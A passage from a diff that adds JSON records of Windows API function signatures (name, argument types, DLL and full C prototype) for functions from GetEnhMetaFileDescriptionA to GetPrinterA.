"function_name": "GetEnhMetaFileDescriptionA", + "arguments": [ + "HENHMETAFILE", + "UINT", + "LPTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetEnhMetaFileDescriptionA(HENHMETAFILE hemf,UINT cchBuffer, LPTSTR lpszDescription);" + }, + { + "function_name": "GetEnhMetaFileDescriptionW", + "arguments": [ + "HENHMETAFILE", + "UINT", + "LPWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetEnhMetaFileDescriptionW(HENHMETAFILE hmf, UINT size, LPWSTR buf);" + }, + { + "function_name": "GetEnhMetaFileHeader", + "arguments": [ + "HENHMETAFILE", + "UINT", + "LPENHMETAHEADER" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetEnhMetaFileHeader(HENHMETAFILE hemf, UINT cbBuffer, LPENHMETAHEADER lpemh);" + }, + { + "function_name": "GetEnhMetaFilePaletteEntries", + "arguments": [ + "HENHMETAFILE", + "UINT", + "LPPALETTEENTRY" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetEnhMetaFilePaletteEntries(HENHMETAFILE hemf, UINT cEntries,LPPALETTEENTRY lppe);" + }, + { + "function_name": "GetEnhMetaFilePixelFormat", + "arguments": [ + "HENHMETAFILE", + "DWORD", + "const PIXELFORMATDESCRIPTOR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetEnhMetaFilePixelFormat(HENHMETAFILE hemf, DWORD cbBuffer, const PIXELFORMATDESCRIPTOR *ppfd);" + }, + { + "function_name": "GetEnvironmentStringsA", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPTCH GetEnvironmentStringsA(void);" + }, + { + "function_name": "GetEnvironmentStringsW", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPWSTR GetEnvironmentStringsW(void);" + }, + { + "function_name": "GetEnvironmentVariableA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetEnvironmentVariableA(LPCTSTR lpName,LPTSTR lpBuffer,DWORD nSize);" + }, + { + "function_name": "GetEnvironmentVariableW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetEnvironmentVariableW(LPCWSTR lpName,LPWSTR lpBuffer,DWORD nSize);" + }, + { + "function_name": "GetExitCodeProcess", + "arguments": [ + "HANDLE", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetExitCodeProcess( HANDLE hProcess, LPDWORD lpExitCode);" + }, + { + "function_name": "GetExitCodeThread", + "arguments": [ + "HANDLE", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetExitCodeThread(HANDLE hThread,LPDWORD lpExitCode);" + }, + { + "function_name": "GetFileAttributesA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetFileAttributesA(LPCTSTR lpFileName);" + }, + { + "function_name": "GetFileAttributesExA", + "arguments": [ + "LPCSTR", + "GET_FILEEX_INFO_LEVELS", + "PVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetFileAttributesExA(LPCSTR lpFileName,GET_FILEEX_INFO_LEVELS fInfoLevelId,PVOID lpFileInformation);" + }, + { + "function_name": "GetFileAttributesExW", + "arguments": [ + "LPCWSTR", + "GET_FILEEX_INFO_LEVELS", + "PVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetFileAttributesExW(LPCWSTR lpFileName,GET_FILEEX_INFO_LEVELS fInfoLevelId,PVOID lpFileInformation);" + }, + { + "function_name": "GetFileAttributesW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetFileAttributesW(LPCWSTR lpFileName);" + }, + { + "function_name": "GetFileInformationByHandle", + "arguments": [ + "HANDLE", + "LPBY_HANDLE_FILE_INFORMATION", + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetFileInformationByHandle( HANDLE hFile, LPBY_HANDLE_FILE_INFORMATION lpFileInformation, );" + }, + { + "function_name": "GetFileSecurityA", + "arguments": [ + "LPCTSTR", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR", + "DWORD", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetFileSecurityA( LPCTSTR lpFileName, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD nLength, LPDWORD lpnLengthNeeded );" + }, + { + "function_name": "GetFileSecurityW", + "arguments": [ + "LPCWSTR", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR", + "DWORD", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetFileSecurityW( LPCWSTR lpFileName, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD nLength, LPDWORD lpnLengthNeeded );" + }, + { + "function_name": "GetFileSize", + "arguments": [ + "HANDLE", + "LPDWORD", + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetFileSize( HANDLE hFile, LPDWORD lpFileSizeHigh, );" + }, + { + "function_name": "GetFileTime", + "arguments": [ + "HANDLE", + "LPFILETIME", + "LPFILETIME", + "LPFILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetFileTime(HANDLE hFile,LPFILETIME lpCreationTime,LPFILETIME lpLastAccessTime,LPFILETIME lpLastWriteTime);" + }, + { + "function_name": "GetFileType", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetFileType(HANDLE hFile);" + }, + { + "function_name": "GetFileVersionInfoSizeA", + "arguments": [ + "LPTSTR", + "LPDWORD" + ], + "dll_name": "version.dll", + "full_prototype": "DWORD GetFileVersionInfoSizeA(LPTSTR lptstrFilename,LPDWORD lpdwHandle);" + }, + { + "function_name": "GetFocus", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetFocus(VOID);" + }, + { + "function_name": "GetFontData", + "arguments": [ + "HDC", + "DWORD", + "DWORD", + "LPVOID", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetFontData(HDC hdc,DWORD dwTable, DWORD dwOffset, LPVOID lpvBuffer, DWORD cbData);" + }, + { + "function_name": "GetFontLanguageInfo", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetFontLanguageInfo(HDC hdc);" + }, + { + "function_name": "GetForegroundWindow", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetForegroundWindow(VOID);" + }, + { + "function_name": "GetFullPathNameA", + "arguments": [ + "LPCTSTR", + "DWORD", + "LPTSTR", + "LPTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetFullPathNameA( LPCTSTR lpFileName, DWORD nBufferLength, LPTSTR lpBuffer, LPTSTR *lpFilePart );" + }, + { + "function_name": "GetFullPathNameW", + "arguments": [ + "LPCWSTR", + "DWORD", + "LPWSTR", + "LPWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetFullPathNameW(LPCWSTR lpFileName,DWORD nBufferLength,LPWSTR lpBuffer,LPWSTR *lpFilePart );" + }, + { + "function_name": "GetGlyphOutlineA", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPGLYPHMETRICS", + "DWORD", + "LPVOID", + "CONST MAT2 *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetGlyphOutlineA(HDC hdc, UINT uChar, UINT uFormat, LPGLYPHMETRICS lpgm, DWORD cbBuffer,LPVOID lpvBuffer, CONST MAT2 * lpmat2);" + }, + { + "function_name": "GetGlyphOutlineW", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPGLYPHMETRICS", + "DWORD", + "LPVOID", + "CONST MAT2 *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetGlyphOutlineW(HDC hdc, UINT uChar, UINT uFormat, LPGLYPHMETRICS lpgm, DWORD cbBuffer,LPVOID lpvBuffer, CONST MAT2 * lpmat2);" + }, + { + "function_name": "GetGraphicsMode", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetGraphicsMode(HDC hdc);" + }, + { + "function_name": "GetGuiResources", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetGuiResources(HANDLE hProcess, DWORD uiFlags);" + }, + { + "function_name": "GetHandleInformation", + "arguments": [ + "HANDLE", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetHandleInformation( HANDLE hObject, LPDWORD lpdwFlags );" + }, + { + "function_name": "GetICMProfileA", + "arguments": [ + "HDC", + "DWORD", + "LPTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetICMProfileA(HDC hdc, DWORD cbName, LPTSTR lpszFilename);" + }, + { + "function_name": "GetICMProfileW", + "arguments": [ + "HDC", + "LPDWORD", + "LPWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetICMProfileW(HDC hdc, LPDWORD size, LPWSTR filename);" + }, + { + "function_name": "GetIconInfo", + "arguments": [ + "HICON", + "PICONINFO" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetIconInfo(HICON hIcon,PICONINFO piconinfo);" + }, + { + "function_name": "GetInputState", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetInputState(VOID);" + }, + { + "function_name": "GetIpStatistics", + "arguments": [ + "PMIB_IPSTATS" + ], + "dll_name": "iphlpapi.dll", + "full_prototype": "DWORD GetIpStatistics(PMIB_IPSTATS pStats);" + }, + { + "function_name": "GetJobA", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "LPBYTE", + "DWORD", + "LPDWORD" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL GetJobA( HANDLE hPrinter, DWORD JobId, DWORD Level, LPBYTE pJob, DWORD cbBuf, LPDWORD pcbNeeded );" + }, + { + "function_name": "GetKBCodePage", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetKBCodePage(VOID);" + }, + { + "function_name": "GetKernelObjectSecurity", + "arguments": [ + "HANDLE", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR", + "DWORD", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetKernelObjectSecurity( HANDLE Handle, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD nLength, LPDWORD lpnLengthNeeded );" + }, + { + "function_name": "GetKerningPairs", + "arguments": [ + "HDC", + "DWORD", + "LPKERNINGPAIR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetKerningPairs(HDC hdc,DWORD nNumPairs,LPKERNINGPAIR lpkrnpair);" + }, + { + "function_name": "GetKeyboardLayout", + "arguments": [ + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HKL GetKeyboardLayout(DWORD dwLayout);" + }, + { + "function_name": "GetKeyboardLayoutList", + "arguments": [ + "int", + "HKL FAR *" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetKeyboardLayoutList(int nBuff, HKL FAR * lpList);" + }, + { + "function_name": "GetKeyboardLayoutNameA", + "arguments": [ + "LPTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetKeyboardLayoutNameA(LPTSTR pwszKLID);" + }, + { + "function_name": "GetKeyboardLayoutNameW", + "arguments": [ + "LPWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetKeyboardLayoutNameW(LPWSTR pwszKLID);" + }, + { + "function_name": "GetKeyboardState", + "arguments": [ + "PBYTE" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetKeyboardState(PBYTE lpKeyState);" + }, + { + "function_name": "GetKeyboardType", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetKeyboardType(int nTypeFlag);" + }, + { + "function_name": "GetKeyNameTextA", + "arguments": [ + "LONG", + "LPTSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetKeyNameTextA(LONG lParam, LPTSTR lpString, int nSize);" + }, + { + "function_name": "GetKeyNameTextW", + "arguments": [ + "LONG", + "LPWSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetKeyNameTextW(LONG lParam, LPWSTR lpString, int nSize);" + }, + { + "function_name": "GetKeyState", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "SHORT GetKeyState(int nVirtKey);" + }, + { + "function_name": "GetLargestConsoleWindowSize", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "COORD GetLargestConsoleWindowSize( HANDLE hConsoleOutput );" + }, + { + "function_name": "GetLastActivePopup", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetLastActivePopup(HWND hWnd);" + }, + { + "function_name": "GetLastError", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetLastError(VOID);" + }, + { + "function_name": "GetLengthSid", + "arguments": [ + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "DWORD GetLengthSid(PSID pSid );" + }, + { + "function_name": "GetLocaleInfoA", + "arguments": [ + "LCID", + "LCTYPE", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetLocaleInfoA(LCID Locale,LCTYPE LCType,LPTSTR lpLCData,int cchData);" + }, + { + "function_name": "GetLocaleInfoW", + "arguments": [ + "LCID", + "LCTYPE", + "LPWSTR", + "INT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "INT GetLocaleInfoW( LCID lcid, LCTYPE lctype, LPWSTR buffer, INT len );" + }, + { + "function_name": "GetLocalTime", + "arguments": [ + "LPSYSTEMTIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID GetLocalTime( LPSYSTEMTIME lpSystemTime );" + }, + { + "function_name": "GetLogColorSpaceA", + "arguments": [ + "HCOLORSPACE", + "LPLOGCOLORSPACE", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetLogColorSpaceA(HCOLORSPACE hColorSpace, LPLOGCOLORSPACE lpbuffer, DWORD nSize);" + }, + { + "function_name": "GetLogColorSpaceW", + "arguments": [ + "HCOLORSPACE", + "LPLOGCOLORSPACEW", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetLogColorSpaceW(HCOLORSPACE a0, LPLOGCOLORSPACEW a1, DWORD a2);" + }, + { + "function_name": "GetLogicalDrives", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetLogicalDrives(VOID);" + }, + { + "function_name": "GetLogicalDriveStringsA", + "arguments": [ + "DWORD", + "LPTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetLogicalDriveStringsA( DWORD nBufferLength, LPTSTR lpBuffer );" + }, + { + "function_name": "GetLogicalDriveStringsW", + "arguments": [ + "DWORD", + "LPWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetLogicalDriveStringsW(DWORD nBufferLength,LPWSTR lpBuffer );" + }, + { + "function_name": "GetLogicalProcessorInformation", + "arguments": [ + "PSYSTEM_LOGICAL_PROCESSOR_INFORMATION", + "PDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetLogicalProcessorInformation( PSYSTEM_LOGICAL_PROCESSOR_INFORMATION Buffer, PDWORD ReturnLength);" + }, + { + "function_name": "GetMailslotInfo", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetMailslotInfo( HANDLE hMailslot, LPDWORD lpMaxMessageSize, LPDWORD lpNextSize, LPDWORD lpMessageCount, LPDWORD lpReadTimeout );" + }, + { + "function_name": "GetMapMode", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetMapMode(HDC hdc);" + }, + { + "function_name": "GetMenu", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU GetMenu(HWND hWnd);" + }, + { + "function_name": "GetMenuCheckMarkDimensions", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG GetMenuCheckMarkDimensions(VOID);" + }, + { + "function_name": "GetMenuContextHelpId", + "arguments": [ + "HMENU" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetMenuContextHelpId(HMENU hmenu);" + }, + { + "function_name": "GetMenuDefaultItem", + "arguments": [ + "HMENU", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetMenuDefaultItem(HMENU hMenu, UINT fByPos, UINT gmdiFlags);" + }, + { + "function_name": "GetMenuItemCount", + "arguments": [ + "HMENU" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetMenuItemCount(HMENU hMenu);" + }, + { + "function_name": "GetMenuItemID", + "arguments": [ + "HMENU", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetMenuItemID(HMENU hMenu, int nPos);" + }, + { + "function_name": "GetMenuItemInfoA", + "arguments": [ + "HMENU", + "UINT", + "BOOL", + "LPMENUITEMINFO" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetMenuItemInfoA(HMENU hMenu, UINT uItem, BOOL fByPosition, LPMENUITEMINFO lpmii);" + }, + { + "function_name": "GetMenuItemInfoW", + "arguments": [ + "HMENU", + "UINT", + "BOOL", + "LPMENUITEMINFOW" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetMenuItemInfoW(HMENU hMenu, UINT uItem, BOOL fByPosition, LPMENUITEMINFOW lpmii);" + }, + { + "function_name": "GetMenuItemRect", + "arguments": [ + "HWND", + "HMENU", + "UINT", + "LPRECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetMenuItemRect(HWND hWnd, HMENU hMenu, UINT uItem, LPRECT lprcItem);" + }, + { + "function_name": "GetMenuState", + "arguments": [ + "HMENU", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT GetMenuState(HMENU hMenu,UINT uId, UINT uFlags);" + }, + { + "function_name": "GetMenuStringA", + "arguments": [ + "HMENU", + "UINT", + "LPTSTR", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetMenuStringA(HMENU hMenu, UINT uIDItem, LPTSTR lpString, int nMaxCount, UINT uFlag);" + }, + { + "function_name": "GetMenuStringW", + "arguments": [ + "HMENU", + "UINT", + "LPWSTR", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetMenuStringW(HMENU hMenu, UINT uIDItem, LPWSTR lpString, int nMaxCount, UINT uFlag);" + }, + { + "function_name": "GetMessageA", + "arguments": [ + "LPMSG", + "HWND", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetMessageA(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax);" + }, + { + "function_name": "GetMessageW", + "arguments": [ + "LPMSG", + "HWND", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetMessageW(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax);" + }, + { + "function_name": "GetMessageExtraInfo", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG GetMessageExtraInfo(VOID);" + }, + { + "function_name": "GetMessagePos", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetMessagePos(VOID);" + }, + { + "function_name": "GetMessageTime", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG GetMessageTime(VOID);" + }, + { + "function_name": "GetMetaFileA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HMETAFILE GetMetaFileA(LPCTSTR lpszFile);" + }, + { + "function_name": "GetMetaFileW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HMETAFILE GetMetaFileW(LPCWSTR lpszMetaFile);" + }, + { + "function_name": "GetMetaFileBitsEx", + "arguments": [ + "HMETAFILE", + "UINT", + "LPVOID" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetMetaFileBitsEx(HMETAFILE hmf, UINT nSize, LPVOID lpvData);" + }, + { + "function_name": "GetMetaRgn", + "arguments": [ + "HDC", + "HRGN" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetMetaRgn(HDC hdc, HRGN hrgn);" + }, + { + "function_name": "GetMiterLimit", + "arguments": [ + "HDC", + "PFLOAT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetMiterLimit(HDC hdc, PFLOAT peLimit);" + }, + { + "function_name": "GetModuleFileNameA", + "arguments": [ + "HMODULE", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetModuleFileNameA( HMODULE hModule, LPTSTR lpFilename, DWORD nSize );" + }, + { + "function_name": "GetModuleFileNameW", + "arguments": [ + "HMODULE", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetModuleFileNameW ( HMODULE hModule, LPWSTR lpFileName, DWORD size );" + }, + { + "function_name": "GetModuleHandleA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HMODULE GetModuleHandleA( LPCTSTR lpModuleName );" + }, + { + "function_name": "GetModuleHandleW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HMODULE GetModuleHandleW( LPCWSTR module );" + }, + { + "function_name": "GetNamedPipeHandleStateA", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetNamedPipeHandleStateA( HANDLE hNamedPipe, LPDWORD lpState, LPDWORD lpCurInstances, LPDWORD lpMaxCollectionCount, LPDWORD lpCollectDataTimeout, LPTSTR lpUserName, DWORD nMaxUserNameSize );" + }, + { + "function_name": "GetNamedPipeHandleStateW", + "arguments": [ + "HANDLE", + "PDWORD", + "PDWORD", + "PDWORD", + "PDWORD", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetNamedPipeHandleStateW(HANDLE hNamedPipe,PDWORD lpState,PDWORD lpCurInstances,PDWORD lpMaxCollectionCount,PDWORD lpCollectDataTimeout,LPWSTR lpUserName,DWORD nMaxUserNameSize );" + }, + { + "function_name": "GetNamedPipeInfo", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetNamedPipeInfo( HANDLE hNamedPipe, LPDWORD lpFlags, LPDWORD lpOutBufferSize, LPDWORD lpInBufferSize, LPDWORD lpMaxInstances );" + }, + { + "function_name": "GetNearestColor", + "arguments": [ + "HDC", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "COLORREF GetNearestColor(HDC hdc, COLORREF crColor);" + }, + { + "function_name": "GetNearestPaletteIndex", + "arguments": [ + "HPALETTE", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetNearestPaletteIndex(HPALETTE hpal, COLORREF crColor);" + }, + { + "function_name": "GetNextDlgGroupItem", + "arguments": [ + "HWND", + "HWND", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetNextDlgGroupItem(HWND hDlg, HWND hCtl, BOOL bPrevious);" + }, + { + "function_name": "GetNextDlgTabItem", + "arguments": [ + "HWND", + "HWND", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetNextDlgTabItem(HWND hDlg, HWND hCtl, BOOL bPrevious);" + }, + { + "function_name": "GetNextWindow", + "arguments": [ + "HWND", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetNextWindow(HWND hWnd, UINT wCmd);" + }, + { + "function_name": "GetNumaAvailableMemoryNode", + "arguments": [ + "UCHAR", + "PULONGLONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetNumaAvailableMemoryNode(UCHAR Node,PULONGLONG AvailableBytes);" + }, + { + "function_name": "GetNumberFormatA", + "arguments": [ + "LCID", + "DWORD", + "LPCTSTR", + "CONST NUMBERFMT *", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetNumberFormatA( LCID Locale, DWORD dwFlags, LPCTSTR lpValue, CONST NUMBERFMT * lpFormat, LPTSTR lpNumberStr, int cchNumber );" + }, + { + "function_name": "GetNumberFormatW", + "arguments": [ + "LCID", + "DWORD", + "LPCWSTR", + "const NUMBERFMTW*", + "LPWSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetNumberFormatW( LCID lcid, DWORD dwFlags, LPCWSTR lpszValue, const NUMBERFMTW* lpFormat, LPWSTR lpNumberStr, int cchOut );" + }, + { + "function_name": "GetNumberOfConsoleInputEvents", + "arguments": [ + "HANDLE", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetNumberOfConsoleInputEvents( HANDLE hConsoleInput, LPDWORD lpcNumberOfEvents );" + }, + { + "function_name": "GetNumberOfConsoleMouseButtons", + "arguments": [ + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetNumberOfConsoleMouseButtons( LPDWORD lpNumberOfMouseButtons );" + }, + { + "function_name": "GetNumberOfEventLogRecords", + "arguments": [ + "HANDLE", + "PDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetNumberOfEventLogRecords( HANDLE hEventLog, PDWORD NumberOfRecords );" + }, + { + "function_name": "GetObjectA", + "arguments": [ + "HGDIOBJ", + "int", + "LPVOID" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetObjectA(HGDIOBJ hgdiobj, int cbBuffer, LPVOID lpvObject);" + }, + { + "function_name": "GetObjectW", + "arguments": [ + "HGDIOBJ", + "int", + "LPVOID" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetObjectW(HGDIOBJ hgdiobj, int cbBuffer, LPVOID lpvObject);" + }, + { + "function_name": "GetObjectType", + "arguments": [ + "HGDIOBJ" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetObjectType(HGDIOBJ h);" + }, + { + "function_name": "GetOEMCP", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetOEMCP(VOID);" + }, + { + "function_name": "GetOldestEventLogRecord", + "arguments": [ + "HANDLE", + "PDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetOldestEventLogRecord( HANDLE hEventLog, PDWORD OldestRecord );" + }, + { + "function_name": "GetOpenClipboardWindow", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetOpenClipboardWindow(VOID);" + }, + { + "function_name": "GetOpenFileNameA", + "arguments": [ + "LPOPENFILENAME" + ], + "dll_name": "comdlg32.dll", + "full_prototype": "BOOL GetOpenFileNameA(LPOPENFILENAME lpofn);" + }, + { + "function_name": "GetOutlineTextMetricsA", + "arguments": [ + "HDC", + "UINT", + "LPOUTLINETEXTMETRIC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetOutlineTextMetricsA(HDC hdc, UINT cbData, LPOUTLINETEXTMETRIC lpOTM);" + }, + { + "function_name": "GetOutlineTextMetricsW", + "arguments": [ + "HDC", + "UINT", + "LPOUTLINETEXTMETRICW" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetOutlineTextMetricsW(HDC hdc, UINT cbData, LPOUTLINETEXTMETRICW lpOTM);" + }, + { + "function_name": "GetOverlappedResult", + "arguments": [ + "HANDLE", + "LPOVERLAPPED", + "LPDWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetOverlappedResult( HANDLE hFile, LPOVERLAPPED lpOverlapped, LPDWORD lpNumberOfBytesTransferred, BOOL bWait );" + }, + { + "function_name": "GetPaletteEntries", + "arguments": [ + "HPALETTE", + "UINT", + "UINT", + "LPPALETTEENTRY" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetPaletteEntries(HPALETTE hpal, UINT iStartIndex,UINT nEntries, LPPALETTEENTRY lppe);" + }, + { + "function_name": "GetParent", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetParent(HWND hWnd);" + }, + { + "function_name": "GetPath", + "arguments": [ + "HDC", + "LPPOINT", + "LPBYTE", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetPath(HDC hdc, LPPOINT lpPoints,LPBYTE lpTypes, int nSize);" + }, + { + "function_name": "GetPixel", + "arguments": [ + "HDC", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "COLORREF GetPixel(HDC hdc,int nXPos,int nYPos);" + }, + { + "function_name": "GetPixelFormat", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetPixelFormat(HDC hdc);" + }, + { + "function_name": "GetPolyFillMode", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetPolyFillMode(HDC hdc);" + }, + { + "function_name": "GetPrinterA", + "arguments": [ + "HANDLE", + "DWORD", + "LPBYTE", + 